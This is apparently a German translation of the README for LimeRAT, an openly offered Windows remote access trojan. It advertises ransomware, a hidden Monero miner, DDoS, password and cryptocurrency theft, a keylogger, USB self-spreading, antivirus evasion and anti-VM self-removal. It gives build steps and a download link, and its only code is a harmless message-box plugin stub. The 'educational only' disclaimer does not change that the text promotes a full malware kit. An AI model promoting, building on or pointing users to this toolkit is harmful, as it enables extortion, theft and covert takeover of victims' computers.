Veraltet. Archivieren statt löschen
LimeRAT v0.1.9
Remote Administration Tool für Windows
Beschreibung
Einfaches, aber leistungsfähiges RAT für Windows-Rechner. Dieses Projekt ist einfach und leicht verständlich. Es soll Ihnen allgemeines Wissen über .NET-Malware und deren Verhalten vermitteln.
Hauptfunktionen
- .NET
- Programmiert in Visual Basic .NET, Client benötigt Framework 2.0 oder 4.0 Abhängigkeit, Server benötigt 4.0
- Verbindung
- Verwendet pastebin.com als ip:port, anstelle von noip.com DNS. Außerdem werden mehrere Ports verwendet
- Plugin
- Verwendet ein Plugin-System, um die Stub-Größe zu verringern und die AV-Erkennung zu senken
- Verschlüsselung
- Die Kommunikation zwischen Server und Client ist mit AES verschlüsselt
- Verbreitung
- Infiziert alle Dateien und Ordner auf USB-Laufwerken
- Umgehung
- Niedrige AV-Erkennung und unentdeckte Startmethode
- Leichtgewichtig
- Anti-Virtuelle Maschinen
- Deinstalliert sich selbst, wenn die Maschine virtuell ist, um Scannen oder Analysieren zu vermeiden
- Ransomware
- Verschlüsselt Dateien auf allen HDDs und USBs mit der Erweiterung .Lime
- XMR-Miner
- Hochleistungs-Monero-CPU-Miner mit Benutzer-IDLE/Aktiv-Optimierungen
- DDoS
- Erzeugt einen leistungsstarken DDOS-Angriff, um einen Online-Dienst unerreichbar zu machen
- Crypto-Stealer
- Stiehlt sensible Kryptowährungsdaten
- Bildschirmsperre
- Verhindert den Zugriff des Benutzers auf die Windows-GUI
- Und mehr
- Bei Verbindung automatische Aufgabe
- Erzwungenes Aktivieren von Windows RDP
- Persistenz
- Dateimanager
- Passwortdiebstahl
- Remote-Desktop
- Bitcoin-Grabber
- Downloader
- Keylogger
Voraussetzungen
Zum Öffnen des Projekts benötigen Sie:
- Visual Studio 2017
- Dieses Repository
Einblick
Projekt
Ransomware
Kritischer Prozess
Plugin-Beispiel
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
C#
public class Main
{
// Simple Msgbox
public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
{
Msgbox("Hello Client!");
Send("MSG" + SPL + "Hello Server!");
// Client will send msg back to server, MSG will be showen in [LOG] Tab
}
}
Testen
- Öffnen Sie "LimeRAT.sln"
- Stellen Sie den Compiler auf "Debug"-Modus
- Klicken Sie im Projektmappen-Explorer mit der rechten Maustaste auf "Projektmappe 'LimeRAT Project'" und drücken Sie "Projektmappe neu erstellen"
- Drücken Sie die Start-Taste. Beachten Sie, dass sowohl Client als auch Server localhost sind
Kompilieren
- Öffnen Sie "LimeRAT.sln"
- Stellen Sie den Compiler auf "Release"-Modus
- Klicken Sie im Projektmappen-Explorer mit der rechten Maustaste auf "Projektmappe 'LimeRAT Project'" und drücken Sie "Projektmappe neu erstellen"
- Alles befindet sich unter "\Project_EXE\Release"
- Konvertieren Sie stub.exe zu stub.il mit Ildasm
Quellcode und kompilierte Version herunterladen
https://github.com/NYAN-x-CAT/Lime-RAT/releases
Dieses Projekt wurde nur im lokalen Labor [LAN] getestet. Ich habe es nicht im externen Labor [WAN] getestet.
Server getestet auf Windows 10, Client getestet auf virtueller Maschine Windows 7.
Hinweise
- Bei Verwendung von Ransomware wird der Wiederherstellungspunkt nicht gelöscht, es sei denn, die Payload läuft mit hohen Rechten
- Anti-Kill (BSOD) funktioniert nicht, es sei denn, die Payload läuft mit hohen Rechten
Einen Fehler gefunden? Bitte melden Sie ihn hier: https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
Autor
Spende
Kauf mir einen Kaffee!
- XMR:
49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2
- BTC:
12hTx7u7AqdNr8qo4UFuLwb6XAVjoDioax
Unterstützung
Haftungsausschluss
Ich, der Ersteller, bin nicht verantwortlich für Handlungen und/oder Schäden, die durch diese Software verursacht werden.
Sie tragen die volle Verantwortung für Ihre Handlungen und erkennen an, dass diese Software nur zu Bildungszwecken erstellt wurde.
Der Hauptzweck dieser Software ist NICHT die böswillige Nutzung oder die Nutzung auf einem System, das nicht Ihnen gehört oder für das Sie kein Nutzungsrecht haben.
Durch die Nutzung dieser Software stimmen Sie automatisch dem oben Genannten zu.
Lizenz

Dieses Projekt ist lizenziert unter der MIT-Lizenz – siehe die Datei LICENSE für Details.